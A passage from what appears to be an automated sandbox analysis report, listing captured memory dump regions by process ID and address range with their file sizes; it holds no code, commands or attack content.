                                        • memory/956-89-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                          Filesize

                                          1.5MB

                                        • memory/956-88-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                          Filesize

                                          1.5MB

                                        • memory/956-87-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                          Filesize

                                          1.5MB

                                        • memory/956-92-0x0000000000400000-0x000000000051D000-memory.dmp
                                          Filesize

                                          1.1MB

                                        • memory/956-90-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                          Filesize

                                          152KB

                                        • memory/956-94-0x0000000000400000-0x000000000051D000-memory.dmp
                                          Filesize

                                          1.1MB

                                        • memory/956-103-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                          Filesize

                                          1.5MB

                                        • memory/956-100-0x0000000000400000-0x000000000051D000-memory.dmp
                                          Filesize

                                          1.1MB

                                        • memory/956-102-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                          Filesize

                                          572KB

                                        • memory/956-101-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                          Filesize

                                          152KB

                                        • memory/956-95-0x0000000000400000-0x000000000051D000-memory.dmp
                                          Filesize

                                          1.1MB

                                        • memory/956-96-0x0000000000400000-0x000000000051D000-memory.dmp
                                          Filesize

                                          1.1MB

                                        • memory/956-98-0x0000000000400000-0x000000000051D000-memory.dmp
                                          Filesize

                                          1.1MB

                                        • memory/1140-117-0x0000000000000000-mapping.dmp
                                        • memory/1444-133-0x0000000000000000-mapping.dmp
                                        • memory/1448-119-0x0000000000000000-mapping.dmp
                                        • memory/1504-125-0x0000000000000000-mapping.dmp
                                        • memory/1556-115-0x0000000000000000-mapping.dmp
                                        • memory/1572-199-0x0000000000000000-mapping.dmp
                                        • memory/1572-200-0x000000013FC30000-0x000000013FC3E000-memory.dmp
                                          Filesize

                                          56KB

                                        • memory/1572-240-0x0000000000760000-0x000000000076E000-memory.dmp
                                          Filesize

                                          56KB

                                        • memory/1584-183-0x0000000000000000-mapping.dmp
                                        • memory/1584-187-0x0000000000A70000-0x0000000000B71000-memory.dmp
                                          Filesize

                                          1.0MB

                                        • memory/1584-189-0x0000000000940000-0x000000000099D000-memory.dmp
                                          Filesize

                                          372KB

                                        • memory/1624-182-0x00000000004D0000-0x00000000004D6000-memory.dmp
                                          Filesize

                                          24KB

                                        • memory/1624-198-0x00000000004E0000-0x00000000004E6000-memory.dmp
                                          Filesize

                                          24KB

                                        • memory/1624-154-0x0000000000000000-mapping.dmp
                                        • memory/1624-178-0x00000000009B0000-0x00000000009EE000-memory.dmp
                                          Filesize

                                          248KB

                                        • memory/1624-196-0x0000000000580000-0x00000000005AC000-memory.dmp
                                          Filesize

                                          176KB

                                        • memory/1672-118-0x0000000000000000-mapping.dmp
                                        • memory/1688-205-0x0000000000300000-0x000000000038A000-memory.dmp
                                          Filesize

                                          552KB

                                        • memory/1688-203-0x0000000000000000-mapping.dmp
                                        • memory/1708-223-0x0000000000C30000-0x0000000000C8B000-memory.dmp
                                          Filesize

                                          364KB

                                        • memory/1708-255-0x00000000008D0000-0x00000000008F2000-memory.dmp
                                          Filesize

                                          136KB

                                        • memory/1708-270-0x0000000000C30000-0x0000000000C8B000-memory.dmp
                                          Filesize

                                          364KB

                                        • memory/1708-300-0x00000000008D0000-0x00000000008F2000-memory.dmp
                                          Filesize

                                          136KB

                                        • memory/1708-162-0x0000000000000000-mapping.dmp
                                        • memory/1724-56-0x0000000000000000-mapping.dmp
                                        • memory/1724-97-0x0000000002C70000-0x0000000002D8D000-memory.dmp
                                          Filesize

                                          1.1MB

                                        • memory/1724-99-0x0000000002C80000-0x0000000002D9D000-memory.dmp
                                          Filesize

                                          1.1MB

                                        • memory/1740-201-0x0000000000000000-mapping.dmp
                                        • memory/1740-202-0x000007FEFBC61000-0x000007FEFBC63000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1756-175-0x0000000000000000-mapping.dmp
                                        • memory/1788-158-0x0000000000000000-mapping.dmp
                                        • memory/1788-190-0x0000000000D30000-0x0000000000E02000-memory.dmp
                                          Filesize

                                          840KB

                                        • memory/1792-176-0x00000000011E0000-0x00000000011E8000-memory.dmp
                                          Filesize

                                          32KB

                                        • memory/1792-130-0x0000000000000000-mapping.dmp
                                        • memory/1900-234-0x0000000000400000-0x000000000041E000-memory.dmp
                                          Filesize

                                          120KB

                                        • memory/1900-232-0x0000000000400000-0x000000000041E000-memory.dmp
                                          Filesize

                                          120KB

                                        • memory/1900-230-0x0000000000417E02-mapping.dmp
                                        • memory/1900-224-0x0000000000400000-0x000000000041E000-memory.dmp
                                          Filesize

                                          120KB

                                        • memory/1900-225-0x0000000000400000-0x000000000041E000-memory.dmp
                                          Filesize

                                          120KB

                                        • memory/1900-227-0x0000000000400000-0x000000000041E000-memory.dmp
                                          Filesize

                                          120KB

                                        • memory/1900-228-0x0000000000400000-0x000000000041E000-memory.dmp
                                          Filesize

                                          120KB

                                        • memory/1900-229-0x0000000000400000-0x000000000041E000-memory.dmp
                                          Filesize

                                          120KB

                                        • memory/1908-216-0x00000000003A0000-0x00000000003CC000-memory.dmp
                                          Filesize

                                          176KB

                                        • memory/1908-217-0x0000000000160000-0x0000000000166000-memory.dmp
                                          Filesize

                                          24KB

                                        • memory/1908-213-0x0000000000000000-mapping.dmp
                                        • memory/1908-214-0x0000000000EB0000-0x0000000000EEE000-memory.dmp
                                          Filesize

                                          248KB

                                        • memory/1908-215-0x0000000000150000-0x0000000000156000-memory.dmp
                                          Filesize

                                          24KB

                                        • memory/1936-156-0x0000000000000000-mapping.dmp
                                        • memory/1964-188-0x00000000FFA4246C-mapping.dmp
                                        • memory/1964-192-0x00000000003D0000-0x0000000000441000-memory.dmp
                                          Filesize

                                          452KB

                                        • memory/1964-191-0x0000000000060000-0x00000000000AC000-memory.dmp
                                          Filesize

                                          304KB

                                        • memory/1964-185-0x0000000000060000-0x00000000000AC000-memory.dmp
                                          Filesize

                                          304KB

                                        • memory/2036-206-0x0000000000000000-mapping.dmp
                                        • memory/2088-221-0x0000000000400000-0x000000000045B000-memory.dmp
                                          Filesize

                                          364KB

                                        • memory/2088-219-0x0000000000000000-mapping.dmp
                                        • memory/2088-222-0x0000000000240000-0x000000000024D000-memory.dmp
                                          Filesize

                                          52KB

                                        • memory/2172-236-0x0000000000000000-mapping.dmp
                                        • memory/2220-238-0x0000000000000000-mapping.dmp
                                        • memory/2348-315-0x0000000000000000-mapping.dmp
                                        • memory/2380-242-0x0000000000000000-mapping.dmp
                                        • memory/2416-243-0x0000000000000000-mapping.dmp
                                        • memory/2456-244-0x0000000000000000-mapping.dmp
                                        • memory/2456-245-0x000000013FD30000-0x000000013FD3E000-memory.dmp
                                          Filesize

                                          56KB

                                        • memory/2668-247-0x0000000000000000-mapping.dmp
                                        • memory/2668-249-0x0000000000400000-0x0000000000422000-memory.dmp
                                          Filesize

                                          136KB

                                        • memory/2672-306-0x0000000000400000-0x0000000000414000-memory.dmp
                                          Filesize

                                          80KB

                                        • memory/2672-298-0x0000000000400000-0x0000000000414000-memory.dmp
                                          Filesize

                                          80KB

                                        • memory/2672-293-0x0000000000000000-mapping.dmp
                                        • memory/2688-294-0x0000000000000000-mapping.dmp
                                        • memory/2716-251-0x0000000000000000-mapping.dmp
                                        • memory/2748-252-0x0000000000000000-mapping.dmp
                                        • memory/2760-253-0x0000000000000000-mapping.dmp
                                        • memory/2760-254-0x000000013FE10000-0x000000013FE16000-memory.dmp
                                          Filesize

                                          24KB

                                        • memory/2908-317-0x0000000000400000-0x00000000014B5000-memory.dmp
                                          Filesize

                                          16.7MB

                                        • memory/2908-318-0x0000000001A10000-0x0000000002AC5000-memory.dmp
                                          Filesize

                                          16.7MB

                                        • memory/2908-319-0x0000000001A10000-0x0000000002AC5000-memory.dmp
                                          Filesize

                                          16.7MB

                                        • memory/2908-307-0x0000000000000000-mapping.dmp
                                        • memory/2984-275-0x0000000140000000-0x0000000140786000-memory.dmp
                                          Filesize

                                          7.5MB

                                        • memory/2984-303-0x0000000140000000-0x0000000140786000-memory.dmp
                                          Filesize

                                          7.5MB

                                        • memory/2984-296-0x0000000140000000-0x0000000140786000-memory.dmp
                                          Filesize

                                          7.5MB

                                        • memory/2984-288-0x000000014030F3F8-mapping.dmp
                                        • memory/2984-273-0x0000000140000000-0x0000000140786000-memory.dmp
                                          Filesize

                                          7.5MB

                                        • memory/2984-271-0x0000000140000000-0x0000000140786000-memory.dmp
                                          Filesize

                                          7.5MB

                                        • memory/2984-268-0x0000000140000000-0x0000000140786000-memory.dmp
                                          Filesize

                                          7.5MB

                                        • memory/2984-267-0x0000000140000000-0x0000000140786000-memory.dmp
                                          Filesize

                                          7.5MB

                                        • memory/3012-302-0x0000000000000000-mapping.dmp
                                        • memory/3012-311-0x0000000003100000-0x00000000041B5000-memory.dmp
                                          Filesize

                                          16.7MB

                                        • memory/3016-312-0x0000000000000000-mapping.dmp